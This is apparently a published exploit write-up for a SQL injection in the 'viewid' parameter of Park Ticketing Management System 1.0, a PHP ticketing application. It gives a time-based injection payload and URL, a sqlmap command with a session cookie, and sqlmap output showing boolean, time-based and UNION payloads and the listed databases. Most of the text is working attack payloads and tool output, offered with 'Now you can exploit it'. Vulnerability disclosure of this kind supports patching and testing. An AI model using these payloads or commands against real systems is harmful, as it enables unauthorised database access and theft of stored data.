82 lines
No EOL
2.6 KiB
Text
82 lines
No EOL
2.6 KiB
Text
# Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 29/1/2021
|
|
# Exploit Author: Zeyad Azima
|
|
# Vendor Homepage: https://phpgurukul.com/
|
|
# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
|
|
# Version: V1
|
|
# Tested on: Windows
|
|
|
|
# Identify the vulnerability
|
|
|
|
1- go to http://localhost/index.php and login with your account
|
|
|
|
2- then go to http://localhost/manage-normal-ticket.php
|
|
|
|
3- Click view on any ticket. then add the following payload to the url
|
|
|
|
payload: ' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB) AND 'QCDH'='QCDH
|
|
url: http://localhost/view-normal-ticket.php?viewid=1%27%20AND%20(SELECT%208292%20FROM%20(SELECT(SLEEP(5)))XIQB)%20AND%20%27QCDH%27=%27QCDH
|
|
|
|
If the web server makes you wait 5 seconds then it's vulnerable
|
|
|
|
|
|
# Exploit
|
|
|
|
Now you can exploit it using sqlmap
|
|
|
|
command: sqlmap -u url --cookies="cookies here" --dbs
|
|
|
|
example: sqlmap -u http://localhost/view-normal-ticket.php?viewid=1
|
|
--cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs
|
|
|
|
___
|
|
__H__
|
|
___ ___[)]_____ ___ ___ {1.4.10.16#dev}
|
|
|_ -| . [)] | .'| . |
|
|
|___|_ [.]_|_|_|__,| _|
|
|
|_|V... |_| http://sqlmap.org
|
|
|
|
[!] legal disclaimer: Usage of sqlmap for attacking targets without
|
|
prior mutual consent is illegal. It is the end user's responsibility
|
|
to obey all applicable local, state and federal laws. Developers
|
|
assume no liability and are not responsible for any misuse or damage
|
|
caused by this program
|
|
|
|
[*] starting @ 23:19:33 /2021-01-29/
|
|
|
|
[23:19:34] [INFO] resuming back-end DBMS 'mysql'
|
|
[23:19:34] [INFO] testing connection to the target URL
|
|
sqlmap resumed the following injection point(s) from stored session:
|
|
---
|
|
Parameter: viewid (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: viewid=1' AND 5743=5743 AND 'wcUF'='wcUF
|
|
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: viewid=1' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB)
|
|
AND 'QCDH'='QCDH
|
|
|
|
Type: UNION query
|
|
Title: Generic UNION query (NULL) - 7 columns
|
|
Payload: viewid=1' UNION ALL SELECT
|
|
NULL,NULL,NULL,CONCAT(0x716a767a71,0x6f5367494d7573444b726d466e617a77735574536d49466a654d6569746b4972745556686a4e4548,0x716a767671),NULL,NULL,NULL--
|
|
-
|
|
---
|
|
[23:19:34] [INFO] the back-end DBMS is MySQL
|
|
web application technology: Apache 2.4.41, PHP 7.3.10
|
|
back-end DBMS: MySQL >= 5.0.12
|
|
[23:19:34] [INFO] fetching database names
|
|
available databases [8]:
|
|
[*] detsdb
|
|
[*] information_schema
|
|
[*] mysql
|
|
[*] performance_schema
|
|
[*] ptmsdb
|
|
[*] sys
|
|
[*] umspsdb
|
|
[*] zmsdb
|
|
|
|
[23:19:34] [INFO] fetched data logged to text files under |